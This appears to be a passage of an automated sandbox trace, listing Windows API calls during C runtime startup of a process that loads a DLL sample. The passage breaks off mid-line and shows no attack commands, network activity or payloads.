end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Thread: id = 78 os_tid = 0xc20 [0033.628] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24f99c | out: lpSystemTimeAsFileTime=0x24f99c*(dwLowDateTime=0xe1ba3b90, dwHighDateTime=0x1d3dfba)) [0033.628] GetCurrentProcessId () returned 0xc1c [0033.628] GetCurrentThreadId () returned 0xc20 [0033.628] GetTickCount () returned 0x178a8 [0033.628] QueryPerformanceCounter (in: lpPerformanceCount=0x24f994 | out: lpPerformanceCount=0x24f994*=367998074) returned 1 [0033.628] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.628] GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0033.628] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0033.628] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0033.628] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0033.629] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.629] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.629] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.629] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.629] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.629] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.629] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.629] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.629] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.629] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.629] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.629] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.629] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.629] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.630] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.630] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0033.630] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.630] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0033.630] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.630] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.630] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0033.630] GetCurrentThreadId () returned 0xc20 [0033.630] GetCommandLineA () returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllCanUnloadNow /fn_args=\"DefaultInstall\"" [0033.630] GetEnvironmentStringsW () returned 0x3579c0* [0033.631] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0033.631] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x7d09f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0033.631] FreeEnvironmentStringsW (penv=0x3579c0) returned 1 [0033.631] GetStartupInfoA (in: lpStartupInfo=0x24f8ec | out: lpStartupInfo=0x24f8ec*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0033.631] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0033.631] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0033.631] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0033.631] SetHandleCount (uNumber=0x20) returned 0x20 [0033.631] GetLastError () returned 0x0 [0033.631] SetLastError (dwErrCode=0x0) [0033.631] GetLastError () returned 0x0 [0033.631] SetLastError (dwErrCode=0x0) [0033.631] GetLastError () returned 0x0 [0033.631] SetLastError (dwErrCode=0x0) [0033.631] GetACP () returned 0x4e4 [0033.631] GetLastError () returned 0x0 [0033.631] SetLastError (dwErrCode=0x0) [0033.631] IsValidCodePage (CodePage=0x4e4) returned 1 [0033.631] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x24f8cc | out: lpCPInfo=0x24f8cc) returned 1 [0033.631] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x24f398 | out: lpCPInfo=0x24f398) returned 1 [0033.631] GetLastError () returned 0x0 [0033.631] SetLastError (dwErrCode=0x0) [0033.631] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x24f328 | out: lpCharType=0x24f328) returned 1 [0033.631] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x24f7ac, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0033.631] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x24f7ac, cbMultiByte=256, lpWideCharStr=0x24f118, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ왈狰Ā") returned 256 [0033.631] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ왈狰Ā", cchSrc=256, lpCharType=0x24f3ac | out: lpCharType=0x24f3ac) returned 1 [0033.631] GetLastError () returned 0x0 [0033.632] SetLastError (dwErrCode=0x0) [0033.632] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0033.632] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x24f7ac, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0033.632] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x24f7ac, cbMultiByte=256, lpWideCharStr=0x24f0e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0033.632] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0033.632] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x24eed8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0033.632] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x24f6ac, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿô\x09¶ôäø$", lpUsedDefaultChar=0x0) returned 256 [0033.632] GetLastError () returned 0x0 [0033.632] SetLastError (dwErrCode=0x0) [0033.632] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x24f7ac, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0033.632] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x24f7ac, cbMultiByte=256, lpWideCharStr=0x24f108, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0033.632] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0033.632] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x24eef8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0033.632] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x24f5ac, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿô\x09¶ôäø$", lpUsedDefaultChar=0x0) returned 256 [0033.632] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0033.632] GetLastError () returned 0x0 [0033.632] SetLastError (dwErrCode=0x0) [0033.632] GetLastError () returned 0x0 [0033.632] SetLastError (dwErrCode=0x0) [0033.632] GetLastError () returned 0x0 [0033.632] SetLastError (dwErrCode=0x0) [0033.632] GetLastError () returned 0x0 [0033.632] SetLastError (dwErrCode=0x0) [0033.632] GetLastError () returned 0x0 [0033.632] SetLastError (dwErrCode=0x0) [0033.632] GetLastError () returned 0x0 [0033.632] SetLastError (dwErrCode=0x0) [0033.632] GetLastError () returned 0x0 [0033.632] SetLastError (dwErrCode=0x0) [0033.632] GetLastError () returned 0x0 [0033.632] SetLastError (dwErrCode=0x0) [0033.633] GetLastError () returned 0x0 [0033.633] SetLastError (dwErrCode=0x0) [0033.633] GetLastError () returned 0x0 [0033.633] SetLastError (dwErrCode=0x0) [0033.633] GetLastError () returned 0x0 [0033.633] SetLastError (dwErrCode=0x0) [0033.633] GetLastError () returned 0x0 [0033.633] SetLastError (dwErrCode=0x0) [0033.633] GetLastError () returned 0x0 [0033.633] SetLastError (dwErrCode=0x0) [0033.633] GetLastError () returned 0x0 [0033.633] SetLastError (dwErrCode=0x0) [0033.633] GetLastError () returned 0x0 [0033.633] SetLastError (dwErrCode=0x0) [0033.633] GetLastError () returned 0x0 [0033.633] SetLastError (dwErrCode=0x0) [0033.633] GetLastError () returned 0x0 [0033.634] SetLastError (dwErrCode=0x0) [0033.634] GetLastError () returned 0x0 [0033.634] SetLastError (dwErrCode=0x0) [0033.634] GetLastError () returned 0x0 [0033.634] SetLastError (dwErrCode=0x0) [0033.634] GetLastError () returned 0x0 [0033.634] SetLastError (dwErrCode=0x0) [0033.634] GetLastError () returned 0x0 [0033.634] SetLastError (dwErrCode=0x0) [0033.634] GetLastError () returned 0x0 [0033.634] SetLastError (dwErrCode=0x0) [0033.634] GetLastError () returned 0x0 [0033.634] SetLastError (dwErrCode=0x0) [0033.634] GetLastError () returned 0x0 [0033.634] SetLastError (dwErrCode=0x0) [0033.634] GetLastError () returned 0x0 [0033.634] SetLastError (dwErrCode=0x0) [0033.634] GetLastError () returned 0x0 [0033.634] SetLastError (dwErrCode=0x0) [0033.634] GetLastError () returned 0x0 [0033.634] SetLastError (dwErrCode=0x0) [0033.634] GetLastError () returned 0x0 [0033.634] SetLastError (dwErrCode=0x0) [0033.634] GetLastError () returned 0x0 [0033.634] SetLastError (dwErrCode=0x0) [0033.634] GetLastError () returned 0x0 [0033.634] SetLastError (dwErrCode=0x0) [0033.634] GetLastError () returned 0x0 [0033.634] SetLastError (dwErrCode=0x0) [0033.634] GetLastError () returned 0x0 [0033.635] SetLastError (dwErrCode=0x0) [0033.635] GetLastError () returned 0x0 [0033.635] SetLastError (dwErrCode=0x0) [0033.635] GetLastError () returned 0x0 [0033.635] SetLastError (dwErrCode=0x0) [0033.635] GetLastError () returned 0x0 [0033.635] SetLastError (dwErrCode=0x0) [0033.635] GetLastError () returned 0x0 [0033.635] SetLastError (dwErrCode=0x0) [0033.635] GetLastError () returned 0x0 [0033.635] SetLastError (dwErrCode=0x0) [0033.635] GetLastError () returned 0x0 [0033.635] SetLastError (dwErrCode=0x0) [0033.635] GetLastError () returned 0x0 [0033.635] SetLastError (dwErrCode=0x0) [0033.635] GetLastError () returned 0x0 [0033.635] SetLastError (dwErrCode=0x0) [0033.635] GetLastError () returned 0x0 [0033.635] SetLastError (dwErrCode=0x0) [0033.635] GetLastError () returned 0x0 [0033.635] SetLastError (dwErrCode=0x0) [0033.635] GetLastError () returned 0x0 [0033.635] SetLastError (dwErrCode=0x0) [0033.635] GetLastError () returned 0x0 [0033.635] SetLastError (dwErrCode=0x0) [0033.635] GetLastError () returned 0x0 [0033.635] SetLastError (dwErrCode=0x0) [0033.635] GetLastError () returned 0x0 [0033.635] SetLastError (dwErrCode=0x0) [0033.635] GetLastError () returned 0x0 [0033.635] SetLastError (dwErrCode=0x0) [0033.636] GetLastError () returned 0x0 [0033.636] SetLastError (dwErrCode=0x0) [0033.636] GetLastError () returned 0x0 [0033.636] SetLastError (dwErrCode=0x0) [0033.636] GetLastError () returned 0x0 [0033.636] SetLastError (dwErrCode=0x0) [0033.636] GetLastError () returned 0x0 [0033.636] SetLastError (dwErrCode=0x0) [0033.636] GetLastError () returned 0x0 [0033.636] SetLastError (dwErrCode=0x0) [0033.636] GetLastError () returned 0x0 [0033.636] SetLastError (dwErrCode=0x0) [0033.636] GetLastError () returned 0x0 [0033.636] SetLastError (dwErrCode=0x0) [0033.636] GetLastError () returned 0x0 [0033.636] SetLastError (dwErrCode=0x0) [0033.636] GetLastError () returned 0x0 [0033.636] SetLastError (dwErrCode=0x0) [0033.636] GetLastError () returned 0x0 [0033.636] SetLastError (dwErrCode=0x0) [0033.636] GetLastError () returned 0x0 [0033.636] SetLastError (dwErrCode=0x0) [0033.636] GetLastError () returned 0x0 [0033.636] SetLastError (dwErrCode=0x0) [0033.636] GetLastError () returned 0x0 [0033.636] SetLastError (dwErrCode=0x0) [0033.636] GetLastError () returned 0x0 [0033.636] SetLastError (dwErrCode=0x0) [0033.636] GetLastError () returned 0x0 [0033.636] SetLastError (dwErrCode=0x0) [0033.636] GetLastError () returned 0x0 [0033.636] SetLastError (dwErrCode=0x0) [0033.637] GetLastError () returned 0x0 [0033.637] SetLastError (dwErrCode=0x0) [0033.637] GetLastError () returned 0x0 [0033.637] SetLastError (dwErrCode=0x0) [0033.637] GetLastError () returned 0x0 [0033.637] SetLastError (dwErrCode=0x0) [0033.637] GetLastError () returned 0x0 [0033.637] SetLastError (dwErrCode=0x0) [0033.637] GetLastError () returned 0x0 [0033.637] SetLastError (dwErrCode=0x0) [0033.637] GetLastError () returned 0x0 [0033.637] SetLastError (dwErrCode=0x0) [0033.637] GetLastError () returned 0x0 [0033.637] SetLastError (dwErrCode=0x0) [0033.637] GetLastError () returned 0x0 [0033.637] SetLastError (dwErrCode=0x0) [0033.637] GetLastError () returned 0x0 [0033.637] SetLastError (dwErrCode=0x0) [0033.637] GetLastError () returned 0x0 [0033.637] SetLastError (dwErrCode=0x0) [0033.637] GetLastError () returned 0x0 [0033.637] SetLastError (dwErrCode=0x0) [0033.637] GetLastError () returned 0x0 [0033.637] SetLastError (dwErrCode=0x0) [0033.637] GetLastError () returned 0x0 [0033.637] SetLastError (dwErrCode=0x0) [0033.637] GetLastError () returned 0x0 [0033.637] SetLastError (dwErrCode=0x0) [0033.637] GetLastError () returned 0x0 [0033.637] SetLastError (dwErrCode=0x0) [0033.637] GetLastError () returned 0x0 [0033.638] SetLastError (dwErrCode=0x0) [0033.638] GetLastError 